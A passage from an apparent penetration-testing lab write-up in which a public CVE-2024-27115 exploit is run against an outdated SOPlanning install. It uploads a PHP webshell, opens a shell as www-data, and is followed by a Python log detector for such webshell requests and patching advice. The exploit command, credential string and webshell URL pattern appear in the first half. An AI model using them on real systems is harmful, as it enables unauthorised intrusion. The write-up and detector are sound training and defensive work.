RCE
The target SOPlanning instance is vulnerable to CVE-2024-27115 because it runs an outdated version, 1.52.01.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bitforge]
└─$ python3 CVE-2024-27115.py --target http://plan.bitforge.lab/www --username admin --password 'dbee8fd60fd4244695084bd84a996882|77ba9273d4bcfa9387ae8652377f4c189e5a47ee'
[+] Uploaded ===> File '3m5.php' was added to the task !
[+] Exploit completed.
Access webshell here: http://plan.bitforge.lab/www/upload/files/cjsqhs/3m5.php?cmd=<command>
Do you want an interactive shell? (yes/no) yes
soplaning:~$ whoami
www-data
soplaning:~$ hostname
BitForge
soplaning:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:5a:98 brd ff:ff:ff:ff:ff:ff
altname enp11s0
inet 192.168.196.186/24 brd 192.168.196.255 scope global ens192
valid_lft forever preferred_lft forever
Using the same authentication bypass technique, the exploit succeeded.
An initial foothold on the target system was established as the www-data
account by chaining the authentication bypass with CVE-2024-27115.
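From the defender's side, the trace this chain leaves is a request for a PHP file under SOPlanning's upload/files attachment directory with a cmd parameter, exactly the webshell URL shown above. The following is an added example, not part of the original writeup or the exploit script, that flags such requests in constructed combined-format access log lines; the log lines, the flag_webshell_hits function and the set of flagged extensions are my assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path pattern taken from the webshell URL above: SOPlanning stores task
# attachments under /www/upload/files/<dir>/<file>. A request there for a
# server-side-executable extension is not legitimate attachment access.
UPLOAD_EXEC_RE = re.compile(
    r"/upload/files/[^/\s]+/[^/\s?]+\.(?:php\d?|phtml|phar)(?:$|\?)", re.I
)

# Minimal combined-log parser (Apache/nginx): client IP, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def flag_webshell_hits(log_lines):
    """Return (ip, path, reason) for requests resembling webshell use under upload/files."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        raw_path = m.group("path")
        if not UPLOAD_EXEC_RE.search(raw_path):
            continue  # ordinary attachment download or unrelated request
        parts = urlsplit(raw_path)
        params = parse_qs(parts.query)
        reason = "exec-extension under upload/files"
        if "cmd" in params:  # the parameter name used by the webshell above
            reason += f"; cmd param: {params['cmd'][0]!r}"
        hits.append((m.group("ip"), parts.path, reason))
    return hits


# Constructed sample lines (assumed, not from the page) mirroring the pattern.
SAMPLE_LOG = [
    '192.168.45.5 - - [01/Jan/2024:10:00:00 +0000] "GET /www/index.php HTTP/1.1" 200 512 "-" "Mozilla"',
    '192.168.45.5 - - [01/Jan/2024:10:00:05 +0000] "GET /www/upload/files/cjsqhs/report.pdf HTTP/1.1" 200 9000 "-" "Mozilla"',
    '192.168.45.5 - - [01/Jan/2024:10:00:09 +0000] "GET /www/upload/files/cjsqhs/3m5.php?cmd=whoami HTTP/1.1" 200 9 "-" "python-requests/2.31"',
    '192.168.45.5 - - [01/Jan/2024:10:00:12 +0000] "GET /www/upload/files/cjsqhs/3m5.php HTTP/1.1" 200 9 "-" "python-requests/2.31"',
]

if __name__ == "__main__":
    for hit in flag_webshell_hits(SAMPLE_LOG):
        print(hit)
```

Beyond detection, the fix is to upgrade past 1.52.01 and to deny server-side script execution in the upload directory so an uploaded .php file is served as inert data.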